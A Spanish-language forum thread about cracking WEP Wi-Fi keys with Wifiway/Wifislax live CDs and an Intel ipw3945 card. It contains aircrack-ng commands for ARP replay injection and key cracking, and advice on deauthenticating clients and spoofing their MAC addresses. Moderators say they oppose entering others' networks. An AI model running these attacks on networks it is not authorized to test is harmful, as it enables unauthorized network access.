Para hacerlo mas rapido, si puedes pon otro PC a navegar por internet. Asi ya tendrás un cliente conectado y asi la cosa suele ser mucho mas rapida.
Saludos
-
el rate lo bajo a 2, sip lo de autentication full me sale bien, es decir, sucefull o algo asi, el otro lo tengo con la mula puesta pero como no conecta a traves de wireless que va por cable no se eso valdra para algo, solo queria hacer la prueba con mi router aver si yo savia o no savia, jeje me tocara ir a buscar una inalambrica por aqui cerca. eneis alguna otra cosa que pueda ser? un saludo y gracias
-
El otro PC que conectes a internet tiene que ser de forma inalambrica. Por cable no te valdrá.
Debes saber que aquí no apoyamos el entrar en redes ajenas.
Saludos
-
no estoy entrando en una red ajena, es mi propia red, que tengo un sobremesa y un portatil lo que pasa que en el sobremesa no tengo red inalambrica, va por cable. si alguien lee el post que me heche una mano si puede gracias.
-
Ya sé que era con tu propio router hombre. Yo lo decia por esto, nada mas:
me tocara ir a buscar una inalambrica por aqui cerca.
Un saludo :)
-
me refiero a la de algun amigo saviendolo el xD jeje
-
Ola a todos.
Lo primero de todo es daros las gracias por todos los manuales, videos y respuestas que dais ayudando a tanta gente... Pero aora soy yo el que precisa de vuestra ayuda...
Tengo una problema y es el siguiente: usando el Live Cd del Wifiway 0.6 y tras lograr que aparezca esa frase que tanto nos llena de alegria a todos: "key found whith leng ..." pues no logro encontrar su equivalente en Ascii ya que lo que me muestra la pantalla es lo siguiente: "key found whith leng 05: B1 XX XX XX XX" ; no logro encontrar su equivalencia en Ascii, ese es el problema... No se si es problema de la encriptacion, de la contraseña o si esta parcheada contra ataques o cualquier cosa...
No creo que tenga mucha importancia pero mi tarjeta es la ipw3945...
Agradeceria cualquier tipo de ayuda o comentario... Muchas gracias de antemano, seguir asi.
------------------------
Como bien te dice indio99, por favor no postes la key ;)
-
Puedes meter esa clave tan pancho...
Si la quieres en ascii en seguridadwireless.net, tienes en herramientas un conversor de hexa a ascii...
Saludos
-
please skyman87, no postees claves descifradas, macs ni nada parecido please.
en cuanto a tu cuestion, puede que simplemente no exista la equivalente en ascii, debido a que por ejemplo la clave se haya creado directamente en hexadecimal, me explico
una clave ascii tiene equivalente hexadecimal
pero una clave hexadecimal, no tiene porqué tener una equivalente ascii
por lo que si vas a trabajar normalmente en guin, introduce la clave directamente (dos veces) indistintamente si es ascii (muy importante distinguir entre mayusculas y minusculas) o hexadecimal (sin dos puntos ni separacion, todo junto) segun sea tu caso, el guin te le detecta automaticamente.
saludos
-
No lo habia pensado pero muchas gracias, es que segui el excelente video manual de hadrianweb (que por cierto muchas gracias por molestarte en hacerlo) y no me di cuenta de que en efecto la clave ya estaba en Ascii... Muchas gracias por la ayuda de veras...
Siento haber dado los datos pero era la unica forma en la que yo pensaba me podriais ayudar, no se volvera a repetir...
Gracias
-
Anda, pues veo que al final resulto util estar un fin de semana entero con el video ;D ;D ;D
-
A ver si alguien me puede ayudar a mi con esto, que soy bastante noob :-[
Estoy tratando de aprender sobre seguridad wireless y wifiway me pareció interesante (tengo una ipw3945), el caso es que seguí paso a paso este manual, con la versión 0.8 de wifiway, pero tengo un problema.
En el momento de autentificarse, me salía el intento de autentificación y el pc se me quedaba colgado. Probé instalando wifiway en mi disco duro pero la cosa seguía igual, luego, tras probar con el script ipw3945.sh he conseguido que la primera autentificación me de sucessful, pero luego se me queda colgado otra vez, y nunca llego a ver la carita.
¿Qué estoy haciendo mal? :(
Un saludo!
-
Pues lo que estas haciendo mal, no lo se, ya que no nos has indicado los comandos utilizados, pero una sugerencia si te puedo dar, si utilizas wifiway 0.8 puedes ejecutar desde la shell airoway.sh, que es un proces que ya hace la auenticiacion con el ap deseado y tambien realiza el ataque
-
Buenas tardes a todos !!!
Estoy intentado inyectar a una ipw3945 con el wifiway versión 0.8 y creo que no me reconoce mi tarjeta de red en la terminal he puesto iwconfig y me aparece esto:
lo no wireless extensions
eth0 no wireless extensions
wifi0 unassociated ESSID:off/any
Mode:Monitor Channnel=6 bit Rate=1 MB/S
rtap0 no wireless extensions
eth1 no wireless extensions
-
Buenas tardes a todos !!!
Estoy intentado inyectar a una ipw3945 con el wifiway versión 0.8 y creo que no me reconoce mi tarjeta de red en la terminal he puesto iwconfig y me aparece esto:
lo no wireless extensions
eth0 no wireless extensions
wifi0 unassociated ESSID:off/any
Mode:Monitor Channnel=6 bit Rate=1 MB/S
rtap0 no wireless extensions
eth1 no wireless extensions
que no te la reconoce ??? ??? ??? ??? ??? ??? ??? ??? ???
claro que te la reconoce, además está cargada con los drivers para inyección.
saludos
-
Mira simplemente tienes que poner en una shell
airoway.sh
Y ya estaras capturando e inyectando si quieres ;D ;D ;D
-
pues si es cierto esta activada en modo monitor ;D ;D
estoy ahora utilizando el airoway.sh y capturando pero que mas tengo que hacer y cuando
como podría hacer capturas del proceso?
pd...perdón por dar la brasa pero soy muy novato
Salu2 :)
-
lee el manual de fragmentación con airoway, creado por juanjetomas
lee las chinchetas que veas, yo puedo decirte los pasos para capturar he inyectar, pero es que eso se ha dicho muchas veces, lee y te enteraras de eso y de muchísimas otras cosas interesantes.
usa la opción buscar, y creeme, aprenderás mucho más, si no sólo sabrás hacer eso, y no sabrás el por que se hace ni nada.
otra cosa, es que después de haber leido el manual, se te presente alguna duda, entonces encantados, tanto yo como mis compañeros en resolvertela.
capturas del proceso, simplemente usando el botón Impr Pt, que por lo general se encuentra cerca de la tecla retroceso (en el teclado).
saludos.
-
Indio99 me he leído el manual que dijiste y me ha ido muy bien probando varias veces cambiando de menos a mas mi clave del AP,
-aunque he podido, hay cosas que aun no cuadran:
1ª la 3 opción que sale en el menú no he visto en el manual que comentas para que sirve ni la he utilizado
2ª la opción 4 no se si entiendo bien sirve para cuando un AP esta a la vista hay que utilizarlo y cuando esta oculto no
3ª el chop-chop no se la utilidad en el manual no aparece nada sobre uso
otra de las dudas para la WPA que según he podido leer hace falta 1 hadshake ???
y para terminar mi consulta y perdonar por pesao jejeje...... en mi pc de sobremesa que tiene la rtl8187 al arrancar el cd-live tanto del wifiway o del wifislax me da un error y no me entra en el sistema
Salu2.................Thank you very much ;D
-
y para terminar mi consulta y perdonar por pesao jejeje...... en mi pc de sobremesa que tiene la rtl8187 al arrancar el cd-live tanto del wifiway o del wifislax me da un error y no me entra en el sistema
deberás ser más explicito, y especificar que error es el que te da, dinos cual es el error, porque entende que puede haber mil errores posibles.
El ataque chopchop, hasta hoy no he escuchado a nadie, que lo haya conseguido con la ipw3945
La opción tres, es para realizar un ataque normal de inyección (sin fragmentación)
puedes hacer tu tus propias pruebas, pero desde que usé la primera vez la fragmentación con la ipw3945, no he echo otra.
y ya sabes, cuando puedas y tengas tiempo, leete algunas chinchetas que veas por ahí, y veras como le cojes rápido el rollo a ésto.
PD: la opción cuatro, ahora mismo no se cual es, ya que uso ubuntu, y tendría que reiniciar ahora para verlo.
saludos
-
pues bien he intentado hacer una captura del arranque del live-cd y como no he podido he tenido que hacer unas fotos
Esto es lo que me pone en el arranque tanto del wifislax y wifiway:
(http://img114.imageshack.us/img114/743/dsc02070640x480lu9.jpg)
los ataques 3 y chop-chop los he probado y todo ok
y la opción 4 es la que dice que pulse si hay cliente para la desconexion (no entiendo su significado)
Salu2
-
vale, la opción cuatro es para eso, para expulsar a un cliente que está conectado, para así forzarlo a asociarse de nuevo, y en esa autentificación, poder capturar unos ARP bastante importantes.
por el error de pantalla, no puedo echarte un cable, quizas otro compañero pueda hacerlo.
saludos
-
vale, la opción cuatro es para eso, para expulsar a un cliente que está conectado, para así forzarlo a asociarse de nuevo, y en esa autentificación, poder capturar unos ARP bastante importantes.
por el error de pantalla, no puedo echarte un cable, quizas otro compañero pueda hacerlo.
saludos
ok gracias Indio99 !!! ;)
haber si alguien entiende el porque del fallo al arrancar,al parecer se trata de algún dispositivo HD o algo parecido
Salu2
-
Un poco extraño pero al final si que funciona, solo que tengo que esperar unos 7 min para que haga la carga en cualquiera de los 2 live-cd
pd.....Indio99 si ves este mensaje muchas gracias por la ayuda ;)
-
una pregunta, si al snifar la red con aerodump no me aparece a la mac una STATION, no puedo realizar el ataque?
segun leo por aqui creo q no, y mi compi tiene el ordenador conectado al router via cable, por ello dedusco que no me aparece la station asociada.
pues eso que estamos aki los dos mirando el portatil esperando la subida de los ARP, lleva 18000 paquetes y no suben.
gracias!
-
BUenas:
Si no hay nadie conectado vía wifi... pues te tocará hacer otro tipo de ataque (un A3 puro no te vale)
Un saludo
ChimoC
-
hola.
1. Ya busque lei y creo que toy dando vueltas en circulo.
En la carpeta sys/class/net/io (no hay mas carpetas)
Tengo un wifiway 0.8,:Inicio con startx,
Luego en consola iwconfig
lo no wireless extensions.
iwconfig rtap0 , wifi 0.
Nada ley que habian manuales que te ayudaban a iniciar tu tarjeta correctamente, pero naka la pirinaka, si me pueden dar alguna ayuda, con esto es una Hp Dv6000(series) ipw3945. (algun enlace porque ya me hice bolas con la busqueda)
-
yo lo e hecho y e obtenido la siguiente clave en hexadecimal (NO_SE_PONEN_CLAVES) ahora resulta que la voy a meter en windows y me la pide en otro codigo de numeracion que supongo que es ascii. pues bien la e pasao a este codigo mediante corversores existentes y me han salido unos simbolos muy raros). bien que puedo hacer? Hay alguna forma de pasarlo aun codigo que sirva para windows? seria alguien capaz de hacerlo con esa wep key? os lo agradeceria muxo. espero respuestas por favor.
-
Buenas:
Buster24... si no es tu red ...... https://foro.seguridadwireless.net/index.php/topic,6093.0.html
jonathan2908... porque no utilizas el airoway.sh..... que es para las ipw3945 (creo que en el apartado del foro de Wifiway 0.8 hay un link de descarga )
Un saludo
ChimoC
-
aver realizando A1 y A3 consigo pillar 19200 ARP y 22000 DATAS.
dejo corriendo el aerodump mientras meto el aircrack, y me dice el aerodump un error de que no guarda ams porque no tengo sitio en el disco duro, e de decir que fisicamente hay sitio de sobra, lo que nose es lo que me reconoce el wifislax. el archivo cap me ocupaba 100MB y ya no aumentaba mas.
aun asi deje el aircrack aver que hacia y lo he parado tras 9h sin resultado.
me podeis iluminar?
1000 gracias!
-
Desde live cd, o instalado en el hd???
-
desde el live cd
-
Eso es posible que sea por la ram, aun asi pues guardar varios archivos .cap, y luego ejecutarlos todos juntos con el aircrack
-
pues tengo 2GB de ram.
y como hago lo de guardar en varios cap sin cortar el airodump?
-
A ver pero cortas el airodump, y guardas el archivo por ejemplo en eun usb, luego vulve a ejecutarlo, y una vez tengas todos los archivos con los datas suficientes, pues haces lo siguiente para aircrack
aircrack-ng -z *.cap
Recuerda que tienes que estar en el mismo dir que los archivos, y si no estas pues pones lo siguiente y punto
aircrack-ng -z /directorio/*.cap
-
weno y si yo paro el airodump y luego lo vuelvo a ejecutar, no empieza desde el principio?
otra duda, estoy leyendo lo de o pillar cap o ivs, y que son diferentes.
yo utilizo el A1 y A3 y pilla cap, por lo que se ve con lo que pillo 19200 ARP y 22000 DATAS no seran suficientes cuando despues de 9h no me saco la clave, me ira mejor con ivs? como lo hago?
espero no desesperar a nadie.
GRACIAS!!
-
Primero a cada captura del airodump le puede poner un nombre con la opcion -w, por ejemplo
airodump-ng -w mired1.cap wifi0
Segundo, para utilizar aircrack de la forma mas rapida es decir con la opcion de -z, es preciso que utilices los cap, ya que con el otro no tira, u eso creo.
Tercero, a veces con 50000datas es suficiente pero otras tienes que espara hasta 80000 o quizas mas
-
hola que tal
resulta que tengo un pequeño problema al intentar inyectar trafico con el driver ipw3945, tengo una dell inspiron 640m, y la interfaz que usa para la wifi es eth1, he tratado de usar el wifiway, pero resulta que hay que modificar un trio de archivos, que no existen en mi com****dora ahí les dejo los archivos, si alguno de ustedes puede ayudarme con esto, les agradecería.
# chmod 777 ipw3945.sh
# ./ipw3945.sh
*************************************************
Script para la inyeccion de la ipw3945
*************************************************
Disenado y desarrollado por seguridadwireless.net
*************************************************
Por favor introduce el canal para la wifi0
6
Indique el rate de captura
2
Indique el bssid para el asociado, separado por puntos (Ej: 00:11:22:33:44:55)
00:1D:5A:2F:03:A9
wifi0: ERROR mientras se obtenian las banderas de interfaz: No existe el dispositivo
chmod: no se puede acceder a `/sys/class/net/wifi0/device/rate': No existe el fichero ó directorio
./ipw3945.sh: line 20: /sys/class/net/wifi0/device/rate: No existe el fichero ó directorio
./ipw3945.sh: line 21: /sys/class/net/wifi0/device/channel: No existe el fichero ó directorio
./ipw3945.sh: line 22: /sys/class/net/wifi0/device/bssid: No existe el fichero ó directorio
wifi0: ERROR mientras se obtenian las banderas de interfaz: No existe el dispositivo
*************************************************
Si se le ha comunicado algun error en el apartado anterior, pues repita el proceso
Si se repite el error comuniquesnolo en el foro de seguridadwireless.net
************************************************* ;D ;D >:( >:( :( :( ??? ??? ??? ??? ??? ::) ::) ::) ::) :-X :-X :'( :'(
-
Con la nueva wifiway no es necesairio cambiar el canal de esa forma, aun asi asegurate de que al hacer iwconfig te sale la interfaz wifi0
Nota: Puedes utilizar airoway
-
Hola antes que nada, y de antemano quiero ofrecer una disculpa por escribir el mismo tema en dos lugares.
Cuando ejecuto iwconfig, no me aparece wifi0, me aparecen las interfaces:
lo
eth0
eth1
Y la única que puedo ejecutar en modo monitor es eth1, además que que lo y eth0 no son extenciones wireless. Esto es lo que aparece:
~$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
eth1 unassociated ESSID:off/any
Mode:Managed Frequency=nan kHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:16 dBm
Retry limit:15 RTS thr:off Fragment thr:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:2 Missed beacon:0
-
Muy extraño, has probado a inyectar utilizando esa???
Una pregunta estas seguro de que es la ipw3945 y no la ipw4935??
-
Hola que tal Agradezco siempre su pronta contestación.
A lo que tan seguro estoy de que es la ipw3945, bueno, estoy tan seguro de que es, asi como me llamo. He intentado todo, e inyectar es imposible. Tambien he intentado cambiar el driver en mi sistema operativo (mandriva debian ubuntu ... parece que son todos los s.o. que he usado)por algún otro parchado, y el resultado es catastrófico, porque!, muy sencillo, se desinstalan mis drivers e instalar los nuevos es imposible. Ojo estoy ahorita tratando con airoway y es ese ahora mi problema.
Por su atencion Mr. hadrianweb, mil gracias
-
En primer luegar perdona por la tardanza en responder, y segundo , has ejecutado el script de inyeccion???, para inyectar tienes que hacerlo y para conectarte ejecutar, el otro, y eso es porque para conexion utiliza un driver y para la inyeccion utiliza otro
-
Bueno en primer luegar la autentificacion no puede hacerse si el ap al que intentas autentificar esta muy lejos, es decir si tienes señal baja, tambien hay que tener en cuenta que muchas veces tambien depende del ap.
Y en segundo luegar, que reinicie el ordenador quien???
Si quieres reiniciar tanto en wifislax como en wifiway lo puedes hacer con el comando reboot
-
Calidad de la señal, desde win con el netstumbler, y en wifislax simplemente haz el iwlist scan, pero deberas tener la tarjeta en modo conexion.
No hay un minimo ni un maximo pero es (muy) recomendable que lo hagas con buena calidad sino podria no funcionar.
Hay algunos routers (o AP´s) que son mas vulnerable que otros por eso digo que puede depender del AP
-
Prueba con comados a mi a veces con comandos me asocia y con airoway no me asocia, sera por el rate o alguna cosa de esas pero a veces pasa.
A la pregunta de recomendacion de usb, en estos momentos tengo mucha informacion en la cabeza, pero sino me equivoco creo que la mejor era la alfa, con chip realtek, aunque yo no la tengo, solo te digo que la edimax aunque tiene buena recepcion tarda en coger arp, y ademas por veces tarda demasiado
-
Pues realiza el ataque a1 + a3
-
quizas la lejania, quizas el router, existen muchos factores, simplemente, intentalo muchas veces, y no desistas, ay que es posible que sea por la mac, asi que si tienes cliente, le haces desautentificacion, y le cojes su mac y te asocias con ella ;D ;D ;D
-
ye te digo el mejor es eso
-
Gente, cuando le doy el ifconfig y me muestra las informaciones de wifi0, me da una direccion mac de mas de 10 pares de letras y numeros, cuando uso el aireplay, solo agarro los primeros 6, pero no es raro que ocurra eso?
No se si ayuda, pero cuando hago todo el proceso, usando esa mac, consigo recibir los paquetes arp, muy lentamente, 2 horas y consegui solo 2 paquetes... Igual de los otros agarra bastante rapido a mi parecer.
Gracias.
-
Si utilizas el airoway, ya sabras cual es tu mac y punto
-
estoy echo un lio bueno saludos pprimero , estoy copiando el ipw3945 i le pego en root cuando ejecuto un terminal nuevo ( el 3 buton de abajo) tecleo chmod 777 ipw3945 dice no such file or direcory y luego tecleo ./ipw3945.sh me pone permision denied gracias q hago?
-
Video inyeccion ipw3945
Espero que os ayude, y que os guste
Con formato de la web:
http://www.seguridadwireless.net/ipw3945.htm
Sin formato de la web: a fondo completo:
http://www.seguridadwireless.net/ipw3945full.htm
alojado ya en:
http://www./public/wifiway/videos/hadrianweb_ipw3945.swf
Reducido de 56 MB a 5 mb:
http://rapidshare.com/files/84389674/hadrianweb_ipw3945.rar
Saludos...
-
jeje, gracias por todo ;D ;D
-
wenas,
una preguntita, cual es esa canción?, eske me encanta
un saludo, JuAnPeIcH ::)
-
jeje, ya ni me acuerdo de la cancion que le puse, tendria que volver a escucharla para saber cual es, pero en estos momentos no puedo :D
-
okis, pus cuando puedas,
-
Post principal modificado, imagenes cambiadas
-
Hola, muchas gracias por toda la información, tutoriales... que tenéis por aquí. Llevo una semana leyendo y leyendo y parece que ahora ya veo la luz.
Pero me he quedado atascado porque hago el ataque desde el live reducido (a1 + a3) y tengo ya 70.000 ARPs y no se hacer funcionar el Aircrack.
Pruebo con aircrack-ng nombre.cap (el nombre es replay_arp-0226-172007.cap aunque no creo que sea relevante) y me responde:
1 "mac" WEP (8 IVs)
Choosing first network as target.
Not enough IVs aviable. You need about 250.000 IVs to crack
40-bit WEP, and more than 800.000 IVs to crack a 104-bit key.
Tambien pruebo con:
aircrack-ptw nombre.cap
Y responde:
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatic.tu-darmtadt.de/aircrack-ptw
allocatinc a new table
bssid = "mac" key index=0
stats for bssid "mac" keyindex=0 packets=8
Creía que hacían falta menos ARPs. Además tengo el router a 3 metros y ha tardado mucho en conseguir tantas.
Muchas gracias.
Talugo.
-
el problema es que el archivo no es este replay_arp-0226-172007.cap el archivo que necesitas es el que capturas con el airodump-ng y no con el aireplay-ng, es decir cuando capturas con airodump-ng le pones la opcion "-w loquesea" ese loquesea sera el nombre del archivo para ejecutar con "aircrack-ng -z loquesea-01.cap"
-
Hola, muchas gracias por darme la solución. El problema que me surge ahora es que yo ejecuto el airodump de la siguiente forma airodump-ng rtap0. Igual que se pone en el tutorial y no tengo ni idea de donde se guarda el cap.
En /root/swireless/capturas/ tengo 4 archivos y 2 son captura-01.cap y captura-02.cap pero cuando uso el aircrack-ng solo me da 36 y 9 IVs.
Además en la raiz hay los otros que empiezan por replay-arp y replay-src.
Ya son 100000 paquetes :/
Gracias de nuevo.
Talugo.
**edito**
Hola, he puesto de nuevo el airodump con -w nombre.cap y ya ha empezado a coger IVs.
El problema es que ahora se ha quedado pillado en 26849 y el archivo ocupa 6MB justas aunque sigue cogiendo datas.
Voy a pararlo todo y a dejarlo esta noche cogiendo por si furula.
Talugo.
-
con 50000 datas deberia ser suficientes eso si si utilizas el ptw
-
Hola buenas a todos, tengo un par de dudas a ver si podeis decirme algo al respecto, me he releido un poco antes de escribir, me he dado cuenta de unas cosas pero empiezo desde el principio.
Yo inicio el procedo de acuerdo con el manualde la siguiente forma:
Los pasos anteriores a estos también los hago pero no quiero ponerlo todo.
Paso 1
airodump-ng rtap0
Con esto comprobamos cual es el canal de ap a atacar y también el bssid.
Paso 2
Luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
En este paso me paso me dice lo siguiente:
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
Paso 3
Y en otra terminal distinta hacemos lo siguiente:
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
Aquí me coge ARP a buen ritmo y llego a tener unos 3 o 4000 todo correcto, ¿no?
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
airodump-ng rtap0 Esto no se para que hay que hacerlo pero lo hago y lo dejo abierto en una nueva terminal
Paso 4
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es:
aircrack-ptw archivo.cap
A mi me pasa como a H3rN4n y veo que le han contestado una solución abajo, intentare a hacerlo con esa solución
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatic.tu-darmtadt.de/aircrack-ptw
allocatinc a new table
bssid = "mac" key index=0
stats for bssid "mac" keyindex=0 packets=8
Mis Dudas:
Para abrir los archivo.cap hay que usar airedump -w archivo.cap que se supone que el nombre del archivo.cap esta en el directorio /root/swireless/capturas/? y se supone que esto es para que los Data y los ARP suban mas rapido?
¿se supone que tienes que tener unos 5000 datas mas o menos, ¿no?
Tengo un poco de lio, he estado mirando detenidamente el video y yo hago lo mismo solo que a mi me da el problema en el paso 2, que hago mal?
-
Buenas:
Este hilo ya es muy largo... por favor dudas sobre la asociación e inyección en su subforo correspondiente.
Este es un hilo de MANUALES .... las cosultas de funcionamiento en otro sitio.
Todos los post que a partir de éste pregunten cómo inyectar, cómo utilizar los archivos o cualquier cosa que se pueda preguntar en su subforo correspondiente.... será directamente BORRADO...... por favor esta es una sección de MANUALES... las consultas a su subforo correspondiente. Que en esos subforos podeis abrir cualquier hilo de preguntas.
Así tendremos un foro ordenado... ok?
Gracias ;)
Un saludo
ChimoC
-
Hola!!
Este tutorial tambien sirve para ipw4965?'???
gracias!!1
-
has leido el titulo del hilo ¿?¿? , parece que no , pues NO ... es para una ipw3945 ...
Saludos